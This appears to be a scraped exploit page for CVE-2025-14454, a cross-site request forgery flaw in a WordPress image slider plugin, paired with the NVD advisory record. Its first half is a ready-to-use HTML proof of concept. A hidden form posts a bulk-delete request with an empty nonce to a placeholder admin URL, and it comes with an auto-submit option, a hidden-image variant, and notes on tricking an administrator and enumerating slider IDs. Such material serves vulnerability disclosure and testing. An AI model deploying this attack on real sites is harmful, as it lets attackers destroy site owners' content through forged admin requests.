CVE-2025-14454

<!-- CVE-2025-14454 CSRF PoC for Image Slider by Ays Plugin --> <!-- This PoC demonstrates how an attacker can trick admin to delete sliders --> <!DOCTYPE html> <html> <head> <title>Image Slider CSRF PoC</title> </head> <body> <h1>CSRF Attack - Delete All Sliders</h1> <p>Click the button below to execute the CSRF attack (as admin):</p> <!-- Form to delete slider with ID 1 --> <form id="csrfForm" action="http://target-site.com/wp-admin/admin.php?page=ays-slider" method="POST"> <input type="hidden" name="action" value="bulk_delete"> <input type="hidden" name="slider[]" value="1"> <input type="hidden" name="_wpnonce" value=""> <input type="hidden" name="ays-slider-action" value="bulk_delete"> <button type="submit">Click me</button> </form> <script> // Auto-submit form when page loads // In real attack, this would be hidden or combined with social engineering // document.getElementById('csrfForm').submit(); </script> </body> </html> <!-- Alternative: Hidden img tag (GET request version if supported) --> <!-- <img src="http://target-site.com/wp-admin/admin.php?page=ays-slider&action=bulk_delete&slider[]=1" width="0" height="0" border="0"> --> <!-- Notes: 1. Attacker must trick WordPress admin into visiting this page 2. Admin must have active session on target site 3. No nonce validation = request will be processed 4. Slider ID can be enumerated or guessed 5. For full attack, use JavaScript to delete multiple sliders in sequence -->

{"cve": {"id": "CVE-2025-14454", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:50.163", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Image Slider by Ays- Responsive Slider and Carousel plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.7.0. This is due to missing or incorrect nonce validation on the bulk delete functionality. This makes it possible for unauthenticated attackers to delete arbitrary sliders via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/ays-slider/tags/2.7.0/includes/lists/class-ays-slider-list-table.php#L430", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ays-slider/trunk/includes/lists/class-ays-slider-list-table.php#L430", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3417916/ays-slider/tags/2.7.1/includes/lists/class-ays-slider-list-table.php?old=3278880&old_path=ays-slider%2Ftags%2F2.7.0%2Fincludes%2Flists%2Fclass-ays-slider-list-table.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e211df80-aab7-43a1-8c11-a472f90ef4c6?source=cve", "source": "[email protected]"}]}}